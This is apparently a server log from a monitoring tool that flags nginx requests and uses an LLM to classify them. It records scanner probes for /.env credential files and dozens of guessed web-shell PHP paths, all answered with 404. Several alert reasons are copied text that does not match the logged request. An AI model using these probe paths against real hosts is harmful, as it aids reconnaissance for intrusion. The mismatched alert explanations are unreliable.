Mar 20 12:39:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:50.729964 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T12:39:50.727836679Z 107.172.116.57 - - [20/Mar/2026:12:39:50 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li...
Mar 20 12:39:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:51.186960 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T12:39:51.186553908Z 107.172.116.57 - - [20/Mar/2026:12:39:51 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like G...
Mar 20 12:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:40:01.936098 [observer] Pipeline: processed=5068 pattern_hits=4956 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:40:01.936124 [observer] Patterns: hash=4956 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112
Mar 20 12:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:40:31.935502 [observer] Pipeline: processed=5072 pattern_hits=4960 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:40:31.935530 [observer] Patterns: hash=4960 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112
Mar 20 12:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:41:01.947340 [observer] Pipeline: processed=5076 pattern_hits=4964 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:41:01.947374 [observer] Patterns: hash=4964 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112
Mar 20 12:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:41:31.935779 [observer] Pipeline: processed=5080 pattern_hits=4968 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:41:31.935813 [observer] Patterns: hash=4968 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112
Mar 20 12:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:42:01.940066 [observer] Pipeline: processed=5082 pattern_hits=4970 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:42:01.940093 [observer] Patterns: hash=4970 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112
Mar 20 12:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:42:31.949907 [observer] Pipeline: processed=5084 pattern_hits=4972 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:42:31.949936 [observer] Patterns: hash=4972 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112
Mar 20 12:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:43:01.946923 [observer] Pipeline: processed=5088 pattern_hits=4976 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:43:01.946952 [observer] Patterns: hash=4976 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112
Mar 20 12:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:43:31.935439 [observer] Pipeline: processed=5090 pattern_hits=4978 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:43:31.935476 [observer] Patterns: hash=4978 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112
Mar 20 12:44:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:44:01.999852 [observer] Pipeline: processed=5094 pattern_hits=4982 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:44:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:44:02.000092 [observer] Patterns: hash=4982 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112
Mar 20 12:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:44:31.942597 [observer] Pipeline: processed=5096 pattern_hits=4984 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:44:31.942623 [observer] Patterns: hash=4984 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112
Mar 20 12:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:01.941403 [observer] Pipeline: processed=5100 pattern_hits=4988 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:01.941442 [observer] Patterns: hash=4988 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112
Mar 20 12:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:31.942404 [observer] Pipeline: processed=5102 pattern_hits=4990 llm_calls=112 llm_errors=1 learned=3
Mar 20 12:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:31.942432 [observer] Patterns: hash=4990 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112
Mar 20 12:45:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:44.357790 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 12:45:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:44.357849 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 12:45:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:46.683057 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:45:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:46.683093 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:45:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:50.014807 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 12:45:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:50.015107 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 12:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:01.829566 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:01.828220783Z 4.204.200.32 - - [20/Mar/2026:12:46:01 +0000] "api.admin.kovicloud.com" "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:01.895333 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:01.894404420Z 4.204.200.32 - - [20/Mar/2026:12:46:01 +0000] "api.admin.kovicloud.com" "GET /wp-blogs.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:01.940674 [observer] Pipeline: processed=5112 pattern_hits=4996 llm_calls=116 llm_errors=1 learned=3
Mar 20 12:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:01.940711 [observer] Patterns: hash=4996 prefix=0 regex=0 contains=0 deny=24 alert=309 suppress=0 misses=116
Mar 20 12:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:01.988251 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:01.985918750Z 4.204.200.32 - - [20/Mar/2026:12:46:01 +0000] "api.admin.kovicloud.com" "GET //tfm.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.053534 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.052386113Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /8xyz.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.120768 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.120476158Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /RIP.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.187882 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.186935949Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /ioxi.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.269241 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.268972961Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /nc4.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.341051 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.340204795Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /wp-ssfc.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.408334 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.406863583Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /ws75.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.474965 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.474353458Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /ws78.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.540605 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.540409216Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /wp-png.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.607130 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.606529489Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /000.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.722416 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.722191258Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /w3lls.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.788389 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.788135957Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /ws86.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.856012 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.855704059Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /xwx1.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.933137 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.932886125Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /ggb.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.010199 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.009883588Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /xff.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.078218 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.077905655Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /wwx.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.153369 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.153189526Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /term.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.220949 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.220681983Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /ws77.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.291383 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.290055299Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /gifclass.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.367231 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.366951873Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /8.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.436099 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.435779042Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /155.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.506897 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.506666540Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /mh.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.572754 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.572462858Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /222.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.640647 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.640296287Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /hehe.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.706915 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.706632901Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /tool.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.772964 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.772544736Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /wp-act.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.843522 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.843289435Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /cu.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.910075 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.909734383Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /fs.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.979480 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.979153693Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /asd.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.050123 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.047886927Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /ws80.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.115580 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.115325607Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /ms.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.181543 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.181112596Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /jga.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.247390 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.247065065Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /666.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.314573 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.314289725Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /zc-104.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.386401 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.386190133Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /ws88.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.508573 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.508304612Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /ws60.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.579864 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.579655890Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /bo.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.651350 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.651066388Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /ws84.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.717473 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.717025133Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /public/vx.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.783418 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.783125908Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /vanda.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.849488 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.849018659Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /amp.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.915435 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.915198508Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /a4.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:04.988579 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:04.988287220Z 4.204.200.32 - - [20/Mar/2026:12:46:04 +0000] "api.admin.kovicloud.com" "GET /1.php HTTP/1.1" 404 146 "-" "-" "-"
